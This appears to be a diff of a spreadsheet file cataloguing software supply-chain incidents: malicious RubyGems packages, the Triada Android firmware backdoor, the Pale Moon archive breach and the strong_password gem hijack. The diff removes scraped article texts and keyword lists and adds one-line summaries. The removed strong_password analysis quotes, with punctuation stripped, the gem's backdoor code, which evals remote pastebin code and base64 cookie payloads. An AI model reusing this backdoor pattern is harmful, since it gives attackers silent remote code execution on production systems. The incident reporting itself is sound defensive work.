privacy statement we’ll occasionally send account related emails already github sign account jump bottom crypto mining cookiepassword stealing malware rubygems closed lingfennan opened issue comments closed crypto mining cookiepassword stealing malware rubygems lingfennan opened issue comments comments copy link lingfennan commented rubygems maintainers found author shaggy uploaded malicious packages please remove author packages packages mainly categories crypto mining alohaanalyser gettext cookiepassword stealing chrometaker colorhacker crypto mining ones contain payload tmprc9 report httpsrubygemsorgprofilesshaggy httpsb4dsablunorgblog20190419ignoringatlassianconfluencesecurityadvisories text updated successfully errors encountered reactions copy link member sonalkr132 commented thank reporting gems yanked blocked handle reactions sorry something went wrong sonalkr132 closed completed copy link kpshek commented sonalkr132 list affected gems yanked know wiki page running list gems yanked entry instance states gems shaggy owner like know exact gems yanked ensure companys internal rubygems cache also malicious gems pulled reactions sorry something went wrong copy link author lingfennan commented edited kpshek full list packages shaggy listed chrometaker colorhacker alohaanalyser gettext rubynmap gettexts colourize colourful tacobell unixcrypt colourlib colourlib jsoncolour unixcrypt autocron jsoncolour copyip colourcat colourgenerator phantomproxy colouradjuster colourparser btcruby kpshek rdeckard reacted thumbs emoji reactions reactions sorry something went wrong sign free join conversation github already account sign comment assignees assigned labels none projects none milestone milestone development branches pull requests participants footer github footer navigation terms privacy status docs contact manage cookies share personal information can’t perform action time</t>
+          <t>The author shaggy has uploaded 23 malicious packages, mainly focused on crypto mining and cookie/password stealing.</t>
         </is>
       </c>
       <c r="D108" t="inlineStr">
         <is>
           <t>https://github.com/rubygems/rubygems.org/issues/2034</t>
-        </is>
-      </c>
-      <c r="E108" t="inlineStr">
-        <is>
-          <t>['toggle', 'navigation', 'sign', 'product', 'action', 'workflow', 'package', 'host', 'manage', 'package', 'vulnerability', 'codespace', 'instant', 'environment', 'copilot', 'well', 'code', 'code', 'review', 'code', 'change', 'issue', 'track', 'work', 'discussion', 'code', 'documentation', 'skill', 'blog', 'solution', 'enterprise', 'team', 'startup', 'education', 'solution', 'cicd', 'automation', 'devsecop', 'resource', 'pathway', 'white', 'paper', 'ebook', 'customer', 'story', 'partner', 'source', 'sponsor', 'open', 'source', 'developer', 'project', 'community', 'article', 'repository', 'topic', 'collection', 'pricing', 'search', 'jump', 'search', 'code', 'repository', 'user', 'issue', 'request', 'clear', 'search', 'syntax', 'tip', 'feedback', 'piece', 'feedback', 'input', 'email', 'address', 'submit', 'feedback', 'search', 'search', 'filter', 'result', 'query', 'available', 'qualifier', 'documentation', 'search', 'sign', 'sign', 'window', 'reload', 'refresh', 'session', 'window', 'reload', 'refresh', 'session', 'account', 'window', 'reload', 'refresh', 'session', 'alert', 'rubygem', 'public', 'notification', 'star', 'issue', 'request', 'discussion', 'action', 'wiki', 'insight', 'additional', 'navigation', 'option', 'code', 'issue', 'request', 'discussion', 'action', 'wiki', 'insight', 'issue', 'question', 'project', 'sign', 'free', 'open', 'issue', 'contact', 'community', 'username', 'email', 'address', 'password', 'sign', 'sign', 'term', 'service', 'privacy', 'statement', 'account', 'email', 'account', 'jump', 'bottom', 'mining', 'issue', 'comment', 'mining', 'issue', 'comment', 'comment', 'link', 'rubygem', 'author', 'malicious', 'package', 'author', 'package', 'package', 'mining', 'mining', 'one', 'payload', 'error', 'reaction', 'link', 'member', 'thank', 'gem', 'handle', 'reaction', 'wrong', 'copy', 'link', 'list', 'gem', 'know', 'wiki', 'page', 'list', 'gem', 'entry', 'instance', 'state', 'gem', 'shaggy', 'owner', 'exact', 'gem', 'company', 'internal', 'rubygem', 'malicious', 'gem', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'author', 'full', 'list', 'package', 'colourful', 'unixcrypt', 'colourlib', 'colourlib', 'reaction', 'reaction', 'sorry', 'wrong', 'sign', 'free', 'conversation', 'sign', 'comment', 'label', 'none', 'none', 'milestone', 'development', 'branch', 'request', 'participant', 'term', 'privacy', 'status', 'doc', 'contact', 'cookie', 'personal', 'information', 'action', 'time']</t>
         </is>
       </c>
     </row>
@@ -3253,17 +2837,12 @@
       </c>
       <c r="C109" t="inlineStr">
         <is>
-          <t>schneier menu blog newsletter books essays news talks academic search powered duckduckgo blog essays whole site subscribe home blog backdoor built android firmware android phones came backdoor preinstalled criminals managed advanced backdoor preinstalled android devices left factories manufacturers google researchers confirmed thursday triada first came light articles published kaspersky first said malware “one advanced mobile trojans” firm’s analysts ever encountered installed triada’s chief purpose install apps could used send spam display employed impressive tools including rooting exploits bypassed protections built android means modify android allpowerful zygote process meant malware could directly tamper every installed triada also connected fewer command control servers july firm reported researchers found triada built firmware several android devices including leagoo plus leagoo nomu nomu attackers used backdoor surreptitiously download install modules backdoor embedded libraries located system section couldn’t deleted using standard methods report said thursday google confirmed report although stopped short naming manufacturers thursday’s report also said supply chain attack pulled partners manufacturers used preparing final firmware image used affected devices supply chain attack seems work criminals could easily nationstate tags android backdoors crime firmware google malware phones supply chain posted june comments comments june advanced persistent marketing alejandro june doesn’t seem like example beginning maybe even iceberg china manufactures phones world government gets involved mass produced factory installed backdoors china leader primary source default phones made anywhere else except china can’t think hand pull june definitely assume governments rootkits quiet effective china long history filling products spywareadware scares technical expertise attack impressive sure june reasons refuse android phone doesn’t official lineageos support fully unlockable boot safest thing burn vendor install ground pave something else sadly even lineageos gamble reasons maintainer given port losing interest stopping updates point downloads said device ‘poof’ downloads page always archive images locally gunter königsmann june guess every country want able listen talk phone china times even completely legit reasons paul johnson june today’s xkcd comic particularly apposite june damn expanded bugging program cisco routers consumer phones too… dollars work tatütata june weeks similar item germany mentioned friday squid comment httpswwwschneiercomblogarchives201906fridaysquidbl680htmlc6793803 device models vulnerability sophisticated june arstechnica post features made triada sophisticated used encoding files encrypt communications file encoding sophisticated since whilst order apply compression stream encryption encoding important it’s exactly matter sophisticated using compression “flatten statistics” prior encryption recomendation since bruce wrote first cryto book blue cover back last century using “xor encoding” mean little nothing encoding everything encryption depends plaintext byte byte value encoding barely different ceaser cipher much mentioned jokes rot13 however using string truly random numbers almost equivalent time it’s rests size reuse access even using complex encryption algorithm generate “key stream” exactly appropriate malware wise parts including often embedded malware code downloaded thus available malware researchers know gate works researcher must surely raise smile “the apps downloaded server communication encrypted using custom encryption routine using double zip” siewierski wrote enough know “com” files solomon” back 1980’s encoding first ways used “morph malware”1 back considered “the way” avoid common “signature” based antivirus detection thus used obfuscation secrecy kind would hoped world kind moved since knowledge effect become “forgotten knowledge” “forgotten” question researchers journalists worse it’s taught several generations software writers people treated like “forbidden fruit” knowledge latter it’s realy little pointless it’s neither difficult find parts information someone slight degree curiosity work “com” file hang days 1970’s simply essense memory image executable code loaded directly memory known offset 100h msdos jumped address started executing code thus malware writer start code three byte jump instruction past block “random bytes” start decryption engine block random bytes could likewise length even random it’s length could easily calculated jump address decryption engine walked it’s image memory decrypting it’s self went repeatedly using “random bytes” thus payload would decrypted executed turn first payload could “run length decoder” similar expand second payload long stayed within 64kbyte limit would work programers time –and wrote code back programer– could version code afternoon using debugcom2 length coder certainly “rocket science” like much else microsoft sold debugcom originally developed even purchased written paterson public domain microsoft used msdos onwards remember acknowledgment knew bill gates “rant” letter people copying basic struck hypocritical best gerard vooren june gunter königsmann guess every country want able listen talk phone okay means view right thing thing pops mind flash computer hardware replace foss software fast controlled anyone cares china times even completely legit reasons introduce china good “completely legit reasons” mine legislation worked sniff everything without caught doesn’t mean necessary contrary watched movie snowden still mind watching movie june reasons refuse android phone doesn’t official lineageos support fully unlockable boot note lineageos builds still depend binary device drivers unknown risks lineageos reduces attack face even limiting apps fdroid that’s best normal android ecosystem spyware embedded backdoors apps phone provider sell call internet history… james june makes think lineage good wise support unsupported hardware androidbased mostly date part part closed source drivers lever firmware almost never updated especially device contain known vulnerabilities lying monthly patch level display latest patch level even though it’s impossible without firmware updates roll back significant improvements like selinux don’t support verified boot can’t aware devices support verified boot custom keys google pixels verified boot important adversary won’t able achieve persistence touching system firmware partition would break verified boot sure lineage adds privacy really would anyone right mind would weird device made shithole china mean yeah maybe cheap risk worth steve june kaspersky surprised nsacia tries defame clive robinson june james would anyone right mind would weird device made shithole china opposed made “shithole” point mobile phones made part whole china might assembled boxed manufacturing supply chain quite cases enough back actually started amongst places bongsmoking primitive monkeybrained spook june schneier criminals could easily nationstate aren’t necessarily mutually exclusive supply chain attack “supply chain attack” bong description true manufacturers weren’t otherwise it’s “subversion logistics network invasion vector plausible deniability” something like james june clive robinson right sane manufacturers audit software phones least “advanced” attack concerning level firmware chance someone simply added “extra features” system image allowing anybody mess phone make sell anything good practice sane manufacturers implement verified boot protect signing keys audit devices obviously sometimes doesn’t happen devices don’t even ship android monthly updates yeah guess devices devices matter made 11umm june bspmbs nice still clicking away trust better health days getting little shut bongsmoking primitive monkeybrained spook june 11umm along didn’t feel contribute much trust better health days improving little burnt candle lights twice long lasts getting little shut habits hard drop pseudorandom june seems work criminals could easily nationstate” criminals convenient plausible deniability june idea librem built interesting note various hardware vendors software references https…developerpurismlibrem5hardwarereferencehtml https…developerpurismlibrem5softwarereferencehtml dropping names like sounds like school cookbookery everyone’s workbench mouser components projects unlimited insecure microelectronics goodix chinese what’s difference frankly hope chinese produce android phones problem much local jamming hacking anything “they” demanding location headers even accepting registration even need location …and beam forming cant infer location within centimeters… regardless signal lock towers fine worked fine years without location info frankly another back door among dozen oddly intrusive bugs list seems hacked june downloaded web’s program onto chinese oppo android malware spoken article purchased jiangsu province march quite phones sitting shelf “androidtriada263origin” lurker june there’s chinese concept called guanxi need connections succeed business krebs interesting breakdown connections involved httpskrebsonsecuritycom201906tracingthesupplychainattackonandroid2 murking july don’t understand would trust lineageos especially thing stopping trojanned https past decade proven breakable subscribe comments entry leave comment cancel reply login name email remember personal info fill blank name blog schneier required comments allowed html hrefurl cite strong blockquote markdown extra syntax httpsmichelfcaprojectsphpmarkdownextra fake news pandemics friday squid blogging squid bags sidebar photo bruce schneier macinnis powered wordpress hosted pressable bruce schneier publicinterest technologist working intersection technology people writing issues blog since monthly newsletter since fellow lecturer harvards kennedy school board member chief architecture inrupt personal website expresses opinions none organizations related entries google pays bounties evolution social media prompt injection worm imagevideo prompt injection attacks european court human rights rejects encryption backdoors canadian citizen gets phone back police featured essays value encryption data toxic asset throw threatens national terrorists google earth fear reason praise theater refuse terrorized eternal value privacy terrorists dont movie plots essays blog archives archive month latest comments blog tags printers hackers mind aaron swartz academic academic papers accountability aclu activism adobe advanced persistent threats adware afghanistan marshals travel airgaps qaeda alarms algorithms alibis amazon android anonymity anonymous antivirus apache apple applied cryptography artificial intelligence tags latest book books blog newsletter books essays news talks academic</t>
+          <t>Criminals in 2017 managed to get an advanced backdoor preinstalled on Android devices before they left the factories of manufacturers.</t>
         </is>
       </c>
       <c r="D109" t="inlineStr">
         <is>
           <t>https://www.schneier.com/blog/archives/2019/06/backdoor_built_.html</t>
-        </is>
-      </c>
-      <c r="E109" t="inlineStr">
-        <is>
-          <t>['schnei', 'menu', 'blog', 'newsletter', 'book', 'essay', 'news', 'talk', 'academic', 'search', 'duckduckgo', 'blog', 'essay', 'whole', 'site', 'home', 'blog', 'backdoor', 'phone', 'backdoor', 'criminal', 'advanced', 'backdoor', 'device', 'factory', 'manufacturer', 'researcher', 'light', 'article', 'kaspersky', 'malware', 'advanced', 'mobile', 'trojan', 'firm', 'analyst', 'chief', 'purpose', 'install', 'app', 'display', 'impressive', 'tool', 'exploit', 'protection', 'mean', 'allpowerful', 'zygote', 'process', 'malware', 'few', 'command', 'control', 'server', 'researcher', 'firmware', 'several', 'android', 'device', 'leagoo', 'leagoo', 'attacker', 'backdoor', 'install', 'module', 'backdoor', 'library', 'system', 'section', 'standard', 'method', 'report', 'report', 'short', 'naming', 'manufacturer', 'report', 'supply', 'chain', 'attack', 'partner', 'manufacturer', 'final', 'firmware', 'image', 'device', 'chain', 'attack', 'work', 'criminal', 'tag', 'supply', 'chain', 'comment', 'comment', 'advanced', 'persistent', 'marketing', 'alejandro', 'example', 'phone', 'world', 'government', 'factory', 'backdoor', 'source', 'default', 'phone', 'hand', 'government', 'rootkit', 'quiet', 'effective', 'long', 'history', 'product', 'spywareadware', 'technical', 'expertise', 'attack', 'impressive', 'reason', 'phone', 'official', 'lineageo', 'support', 'unlockable', 'boot', 'safe', 'thing', 'burn', 'vendor', 'install', 'ground', 'lineageos', 'gamble', 'reason', 'port', 'interest', 'update', 'point', 'download', 'device', 'poof', 'page', 'archive', 'image', 'gunter', 'country', 'able', 'phone', 'time', 'legit', 'reason', 'today', 'comic', 'program', 'consumer', 'phone', 'dollar', 'work', 'tatütata', 'week', 'similar', 'item', 'httpswwwschneiercomblogarchives201906fridaysquidbl680htmlc6793803', 'device', 'model', 'vulnerability', 'sophisticated', 'feature', 'file', 'communication', 'file', 'sophisticated', 'order', 'compression', 'stream', 'encryption', 'important', 'sophisticated', 'compression', 'flatten', 'statistic', 'prior', 'encryption', 'recomendation', 'book', 'blue', 'last', 'century', 'little', 'encryption', 'plaintext', 'byte', 'byte', 'value', 'different', 'much', 'joke', 'rot13', 'string', 'random', 'number', 'equivalent', 'time', 'rests', 'size', 'reuse', 'access', 'complex', 'encryption', 'algorithm', 'key', 'stream', 'appropriate', 'malware', 'wise', 'part', 'available', 'malware', 'researcher', 'gate', 'work', 'researcher', 'smile', 'app', 'server', 'communication', 'custom', 'encryption', 'routine', 'double', 'zip', 'enough', 'com', 'encoding', 'first', 'way', 'malware”1', 'way', 'common', 'signature', 'detection', 'obfuscation', 'secrecy', 'kind', 'world', 'knowledge', 'effect', 'knowledge', 'question', 'researcher', 'journalist', 'bad', 'several', 'generation', 'software', 'writer', 'people', 'fruit', 'knowledge', 'realy', 'little', 'pointless', 'difficult', 'find', 'part', 'information', 'degree', 'curiosity', 'work', 'com', 'file', 'hang', 'day', 'essense', 'memory', 'image', 'executable', 'code', 'memory', 'msdo', 'address', 'code', 'writer', 'code', 'byte', 'jump', 'instruction', 'block', 'random', 'bytes', 'decryption', 'engine', 'block', 'random', 'byte', 'random', 'length', 'jump', 'address', 'decryption', 'engine', 'image', 'memory', 'decrypting', 'self', 'random', 'byte', 'turn', 'first', 'payload', 'length', 'decoder', 'similar', 'expand', 'second', 'payload', 'limit', 'programer', 'time', 'code', 'afternoon', 'length', 'rocket', 'science', 'much', 'public', 'domain', 'acknowledgment', 'bill', 'gate', 'rant', 'letter', 'people', 'basic', 'hypocritical', 'good', 'country', 'able', 'talk', 'phone', 'view', 'right', 'thing', 'thing', 'mind', 'flash', 'computer', 'hardware', 'replace', 'time', 'legit', 'reason', 'good', 'legit', 'reason', 'mine', 'legislation', 'necessary', 'contrary', 'movie', 'snowden', 'movie', 'reason', 'phone', 'official', 'lineageo', 'support', 'unlockable', 'boot', 'note', 'lineageo', 'binary', 'device', 'driver', 'unknown', 'risk', 'lineageo', 'attack', 'face', 'app', 'normal', 'android', 'ecosystem', 'spyware', 'backdoor', 'app', 'phone', 'provider', 'call', 'internet', 'history', 'lineage', 'good', 'wise', 'support', 'unsupported', 'hardware', 'date', 'part', 'part', 'source', 'driver', 'lever', 'firmware', 'device', 'known', 'vulnerability', 'monthly', 'patch', 'level', 'display', 'late', 'patch', 'level', 'impossible', 'firmware', 'update', 'significant', 'improvement', 'boot', 'aware', 'device', 'boot', 'custom', 'key', 'pixel', 'boot', 'important', 'adversary', 'able', 'persistence', 'touching', 'system', 'firmware', 'partition', 'verified', 'boot', 'sure', 'lineage', 'privacy', 'right', 'mind', 'device', 'shithole', 'cheap', 'risk', 'right', 'mind', 'device', 'shithole', 'shithole', 'point', 'mobile', 'phone', 'part', 'whole', 'boxed', 'manufacturing', 'supply', 'chain', 'case', 'place', 'primitive', 'spook', 'schneier', 'criminal', 'exclusive', 'supply', 'chain', 'attack', 'chain', 'attack', 'bong', 'description', 'true', 'manufacturer', 'subversion', 'logistic', 'network', 'invasion', 'vector', 'plausible', 'deniability', 'sane', 'manufacturer', 'software', 'phone', 'advanced', 'attack', 'level', 'firmware', 'chance', 'extra', 'feature', 'system', 'image', 'mess', 'phone', 'make', 'good', 'practice', 'sane', 'manufacturer', 'boot', 'key', 'audit', 'device', 'device', 'monthly', 'update', 'guess', 'device', 'device', 'matter', '11umm', 'nice', 'trust', 'well', 'health', 'day', 'little', 'shut', 'primitive', 'spook', '11umm', 'much', 'trust', 'well', 'health', 'day', 'little', 'candle', 'light', 'little', 'shut', 'habit', 'pseudorandom', 'work', 'criminal', 'criminal', 'convenient', 'plausible', 'deniability', 'idea', 'interesting', 'various', 'hardware', 'vendor', 'software', 'reference', 'https', 'developerpurismlibrem5hardwarereferencehtml', 'https', 'developerpurismlibrem5softwarereferencehtml', 'name', 'school', 'cookbookery', 'workbench', 'mouser', 'component', 'unlimited', 'insecure', 'microelectronic', 'goodix', 'difference', 'phone', 'much', 'local', 'jamming', 'location', 'header', 'registration', 'location', 'beam', 'location', 'centimeter', 'regardless', 'signal', 'lock', 'tower', 'fine', 'year', 'location', 'info', 'back', 'door', 'dozen', 'intrusive', 'bug', 'list', 'program', 'chinese', 'oppo', 'article', 'quite', 'phone', 'shelf', 'chinese', 'concept', 'need', 'connection', 'business', 'krebs', 'interesting', 'breakdown', 'connection', 'murking', 'lineageo', 'thing', 'https', 'past', 'decade', 'breakable', 'subscribe', 'comment', 'entry', 'leave', 'comment', 'reply', 'login', 'name', 'email', 'personal', 'info', 'blank', 'name', 'blog', 'schneier', 'comment', 'strong', 'blockquote', 'fake', 'news', 'pandemic', 'bag', 'sidebar', 'photo', 'schneier', 'pressable', 'schneier', 'technologist', 'working', 'intersection', 'technology', 'people', 'issue', 'blog', 'monthly', 'newsletter', 'fellow', 'member', 'chief', 'architecture', 'inrupt', 'personal', 'website', 'opinion', 'none', 'organization', 'entry', 'bounty', 'evolution', 'social', 'media', 'prompt', 'injection', 'worm', 'imagevideo', 'prompt', 'injection', 'attack', 'court', 'right', 'encryption', 'backdoor', 'canadian', 'citizen', 'phone', 'police', 'essay', 'encryption', 'datum', 'toxic', 'asset', 'throw', 'national', 'terrorist', 'reason', 'praise', 'theater', 'eternal', 'value', 'privacy', 'terrorist', 'plot', 'essay', 'archive', 'archive', 'month', 'late', 'comment', 'blog', 'tag', 'hacker', 'academic', 'academic', 'paper', 'accountability', 'activism', 'adobe', 'persistent', 'threat', 'marshal', 'alarm', 'algorithm', 'alibis', 'anonymous', 'cryptography', 'artificial', 'intelligence', 'tag', 'late', 'book', 'book', 'blog', 'newsletter', 'book', 'essay', 'news', 'talk', 'academic']</t>
         </is>
       </c>
     </row>
@@ -3278,15 +2857,14 @@
           <t>RubyGems.org</t>
         </is>
       </c>
-      <c r="C110" t="inlineStr"/>
+      <c r="C110" t="inlineStr">
+        <is>
+          <t>The passgen Ruby Gem included a backdoor in the latest release.</t>
+        </is>
+      </c>
       <c r="D110" t="inlineStr">
         <is>
           <t>https://help.rubygems.org/discussions/problems/36541-reporting-backdoor-on-passgen</t>
-        </is>
-      </c>
-      <c r="E110" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -3303,17 +2881,12 @@
       </c>
       <c r="C111" t="inlineStr">
         <is>
-          <t>strongpassword v007 rubygem hijacked tute costa july recently updated minor patch versions gems rails uses want keep dependencies fresh bugs fixed vulnerabilities addressed maintaining high chance backward compatibility codebase gems we’d upgrade went line line linking library’s changeset diligence never reported significant surprises time gems changelogmd file describes changes version compare tags commits list like cocoon bcrypt gems jqueryrails upgrade contains jqueryjs upgrade related another project couldn’t find changes strongpassword appeared gone last change branch github months date code existed rubygemsorg downloaded rubygems compared contents latest copy github libstrongpasswordstrengthcheckerrb version following begin yield rescue exception thread loop sleep rand eval http httpspastebincomrawxa456pft rails checked published almost empty account different name maintainer’s access checked maintainer’s email github wrote prettified version diff begin yield rescue exception thread loop sleep rand eval http httpspastebincomrawxa456pft rails loop within thread waiting random number seconds hour fetches runs code stored pastebincom running production empty exception handler ignores error raise fifteen minutes brian mcmanus wrote back seems pulled login rubygemsorg don’t seem ownership bogus release created case pastebin deleted changed emailed pastebin june 28th carboncopying ruby rails’ coordinator rafael frança unless defined rack sendfile prepend module definemethod call eval base64 urlsafedecode64 httpcookie match super faraday httpsmileyzzzcomua urlhost waiting answers tried understand code didn’t checking existence dummy constant injects middleware eval cookies named suffix production surrounded empty exception handler function that’s defined hijacked opening door silently executing remote code production attacker’s also sends request controlled domain http header informing infected host urls depends faraday loaded notification work oauth2 stripe gems example include rafael frança replied minutes adding securityrubygemsorg thread someone rubygems quickly yanked next andré arko confirmed yanked locked kickball rubygems account added brian back asked identifier common vulnerabilities exposures cverequestmitreorg assigned cve201913354 used announce potential issue production installations rubysecrubyadvisorydb project rubysecurityann google group edit july author explained thinks account taken rubygems account long enough 2factorauth wasn’t even option back didn’t unique passwords different websites since many services breached attackers might guessed credentials password managers rotate weak passwords activate wherever matters tute costa principal engineer epion health focuses building infrastructure architecture epion’s patient engagement platform coding find riding bike around small mountains córdoba argentina previous articles writing architecture documents developers mystery guest development edition branching model people sharing single testing environment rails monolith towards engines spike story backwardcompatible database migrations avoiding ruby programs null databases developmentproduction parity rails internationalization keep simple kiss coding principle using logs power rails development workflow reporting ephemeral containers production strongpassword v007 rubygem hijacked</t>
+          <t>The RubyGems.org account of the strong_password RubyGem creator was compromised and a malicious payload was added to a new version.</t>
         </is>
       </c>
       <c r="D111" t="inlineStr">
         <is>
           <t>https://withatwist.dev/strong-password-rubygem-hijacked.html</t>
-        </is>
-      </c>
-      <c r="E111" t="inlineStr">
-        <is>
-          <t>['rubygem', 'minor', 'patch', 'version', 'gem', 'rail', 'dependency', 'fresh', 'bug', 'vulnerability', 'high', 'chance', 'backward', 'compatibility', 'codebase', 'gem', 'line', 'line', 'library', 'changeset', 'diligence', 'significant', 'surprise', 'time', 'gem', 'changelogmd', 'file', 'change', 'version', 'compare', 'tag', 'list', 'gem', 'upgrade', 'project', 'change', 'last', 'change', 'branch', 'rubygem', 'content', 'begin', 'rescue', 'exception', 'thread', 'loop', 'rail', 'empty', 'account', 'different', 'name', 'maintainer', 'access', 'maintainer', 'email', 'version', 'diff', 'begin', 'rescue', 'exception', 'thread', 'loop', 'rail', 'thread', 'random', 'number', 'second', 'hour', 'fetch', 'code', 'production', 'empty', 'exception', 'handler', 'error', 'raise', 'minute', 'login', 'bogus', 'release', 'case', 'pastebin', 'pastebin', '28th', 'ruby', 'rail', 'coordinator', 'rack', 'sendfile', 'module', 'call', 'eval', 'base64', 'urlsafedecode64', 'faraday', 'httpsmileyzzzcomua', 'urlhost', 'answer', 'code', 'existence', 'constant', 'inject', 'middleware', 'eval', 'cookie', 'production', 'empty', 'exception', 'handler', 'function', 'opening', 'door', 'remote', 'code', 'production', 'attacker', 'request', 'domain', 'http', 'header', 'infected', 'host', 'url', 'notification', 'work', 'stripe', 'gem', 'example', 'minute', 'securityrubygemsorg', 'thread', 'kickball', 'rubygem', 'account', 'identifi', 'common', 'vulnerability', 'potential', 'issue', 'production', 'installation', 'rubysecrubyadvisorydb', 'account', 'rubygem', 'option', 'unique', 'password', 'different', 'website', 'many', 'service', 'attacker', 'credential', 'password', 'manager', 'weak', 'password', 'matter', 'tute', 'costa', 'principal', 'engineer', 'epion', 'health', 'infrastructure', 'architecture', 'epion', 'patient', 'engagement', 'platform', 'bike', 'small', 'mountain', 'previous', 'article', 'architecture', 'document', 'developer', 'mystery', 'guest', 'development', 'edition', 'branching', 'model', 'people', 'single', 'testing', 'environment', 'monolith', 'engine', 'spike', 'story', 'backwardcompatible', 'database', 'migration', 'ruby', 'program', 'null', 'database', 'developmentproduction', 'parity', 'rail', 'internationalization', 'simple', 'kiss', 'principle', 'log', 'power', 'rail', 'development', 'workflow', 'ephemeral', 'container', 'production', 'rubygem']</t>
         </is>
       </c>
     </row>
@@ -3330,17 +2903,12 @@
       </c>
       <c r="C112" t="inlineStr">
         <is>
-          <t>browser longer supported please switch supported browser continue using twittercom list supported browsers help center help center terms service privacy policy cookie policy imprint info corp</t>
+          <t xml:space="preserve">A Canonical owned account on GitHub whose credentials were compromised was used to create repositories and issues among other activities. </t>
         </is>
       </c>
       <c r="D112" t="inlineStr">
         <is>
           <t>https://twitter.com/ubuntu_sec/status/1147675201632473088</t>
-        </is>
-      </c>
-      <c r="E112" t="inlineStr">
-        <is>
-          <t>['browser', 'list', 'browser', 'center', 'center', 'term', 'service', 'privacy', 'policy', 'cookie', 'policy', 'imprint']</t>
         </is>
       </c>
     </row>
@@ -3357,17 +2925,12 @@
       </c>
       <c r="C113" t="inlineStr">
         <is>
-          <t>pale moon forum discussion forum pale moon browser visit pale moon home page skip content search advanced search quick links unread posts unanswered topics active topics search rules login register forum index bulletin board forum website unread posts search data breach postmortem bulletin board pale moon website moderators franklindm lootyhoof locked print view search advanced search first unread post post page moonchild pale moon guru posts joined location motala contact contact moonchild website data breach postmortem unread post moonchild data breach archive server archivepalemoonorg attempt made sabotage project infecting archived executables server trojanvirus dropper postmortem report posted provide full transparency community happened gathered files affected verify downloads done prevent breaches future happened malicious party gained access time windowsbased archive server archivepalemoonorg weve renting frantechbuyvm script selectively infect archived pale moon files stored installers portable selfextracting archives variant win32clipbankerdy eset designation running infected executables drop trojanbackdoor system would potentially allow compromise moment reported shut access archive server prevent potential spread infected binaries start investigation happen according datetime stamps infected files happened december around possible datetime stamps forged update getting feedback users breach seems occurred much recently makes sense considering would really would gone unnoticed long time estimate somewhere april june happen data limited later incident likely party similar access archive server rendered completely inoperable point widespread data corruption unable boot retrieve data unfortunately also means system logs providing exact details breach lost time becoming inoperable archive server different moved windows centos changed access http result considering linux cant easily server purely convenience service users judging modified time stamps files infected rapid succession increasing file size malicious payload infected locally system likely script performing direct file manipulations infected files uploaded remotely infected state process elimination potential access user accounts could gain access manner required perform infection clear infection happened local access system physical access access different node insufficient separation access different local subnet insecurehijacked remote desktop session insufficient separation access file system administrative access potentially bruteforcing credentials network sambawfs insufficient vmnet separationnot blocking ports nodedc access remote access control panel insecure control panel provider issue provided windows server image preactivatedvolume licensed provider ruled remote access remote access execution insecure software potential breach points considering access times limited locked secure unique password protection remote windows solid affected affected archived executables installers portable exes pale moon archived versions basilisk storage server although would already present time affected targeted files archive server infected never affected main distribution channels pale moon considering archived versions would updated next release cycle would happen time current versions matter retrieved would infected note files server level affected files inside archives extractable 7zip installersportable versions files inside archives modified unfortunately incident rendered server inoperable files transferred system taken backup made earlier already infected state passage time breach gone undetected infected binaries carried centos solution verify downloaded files clean never downloaded archivepalemoonorg almost certainly clear sure recommend using least steps versions pale moon come accompanying files signatures verify files tampered changed apart period codesigning used unavailability reasonable cost open source development binaries also codesigned checked rightclick properties digital signatures missing binary either signed modified original later versions archived executables also come sha256 accompanying file hashestxt verify integrity somewhat complete list sha256 hashes clean files httpspastebincomlp27meqe additionally infection known major antivirus vendors scan downloadssystem preferred mainstream antivirus scanner verify installers clean inadvertently infected installer portable selfextractor suggest full scan clean system reputable antivirus software clean malware done prevent future considering likely breach points involved providercentric trust provider sufficient anymore continue using even convenience storage server like done centos setup considerably locked still prevent local access control panel access weak points setup looking alternatives offer storage potential solutions provide option archive pastversion binaries symbols pregit source snapshots suggestions high level trust prevent kind nasty situation happening please send private message integrity must high verifiable archive server restored limited capacity using afterburst next couple days sometimes best want good person louis rossmann seek wisdom knowledge knowledge past wisdom future native american proverb linux makes everything difficult lyceus anubite locked print view post page return “forum website” jump announcements pale moon frequently asked questions browser support compatibility support browser development localization language packs sync service pale moon contributed party builds otherfuture projects goanna platform addons extension releasessupport theme releasessupport platform development basilisk epyrus ambassador applications bulletin board general discussion forum website tutorialshowtos foreign language boards german deutsch french français spanish español russian русский languages fossamail newsannouncements fossamail support fossamail development fossamail user area windows support pale moon tycho alphabeta pale moon alphabeta general discussion pale moon addons website pale moon android binary outcast projects forum index times delete cookies powered phpbb forum software phpbb limited</t>
+          <t xml:space="preserve">A malicious party gained access to the archive server and infected all archived executables on the server with a trojan/virus dropper.  </t>
         </is>
       </c>
       <c r="D113" t="inlineStr">
         <is>
           <t>https://forum.palemoon.org/viewtopic.php?f=17&amp;t=22526</t>
-        </is>
-      </c>
-      <c r="E113" t="inlineStr">
-        <is>
-          <t>['discussion', 'home', 'page', 'content', 'search', 'advanced', 'search', 'quick', 'link', 'unread', 'post', 'topic', 'active', 'topic', 'search', 'rule', 'login', 'register', 'index', 'website', 'unread', 'post', 'search', 'datum', 'breach', 'postmortem', 'bulletin', 'board', 'website', 'moderator', 'print', 'view', 'search', 'advanced', 'search', 'first', 'unread', 'post', 'post', 'page', 'moonchild', 'moon', 'guru', 'post', 'location', 'contact', 'moonchild', 'website', 'breach', 'postmortem', 'unread', 'post', 'moonchild', 'datum', 'breach', 'archive', 'server', 'attempt', 'sabotage', 'project', 'server', 'report', 'full', 'transparency', 'community', 'file', 'verify', 'download', 'breach', 'future', 'malicious', 'party', 'access', 'time', 'archive', 'server', 'pale', 'moon', 'file', 'portable', 'archive', 'win32clipbankerdy', 'eset', 'designation', 'executable', 'drop', 'trojanbackdoor', 'system', 'compromise', 'moment', 'access', 'archive', 'server', 'potential', 'binary', 'investigation', 'datetime', 'stamp', 'file', 'possible', 'datetime', 'stamp', 'update', 'feedback', 'user', 'breach', 'sense', 'unnoticed', 'long', 'time', 'estimate', 'datum', 'incident', 'party', 'similar', 'access', 'archive', 'server', 'inoperable', 'point', 'widespread', 'data', 'corruption', 'unable', 'boot', 'retrieve', 'datum', 'system', 'log', 'exact', 'detail', 'breach', 'time', 'inoperable', 'archive', 'server', 'different', 'window', 'cento', 'access', 'http', 'result', 'convenience', 'service', 'user', 'modified', 'time', 'stamp', 'file', 'rapid', 'succession', 'file', 'size', 'malicious', 'payload', 'system', 'likely', 'script', 'direct', 'file', 'manipulation', 'file', 'state', 'process', 'elimination', 'potential', 'access', 'user', 'account', 'access', 'manner', 'perform', 'infection', 'clear', 'infection', 'local', 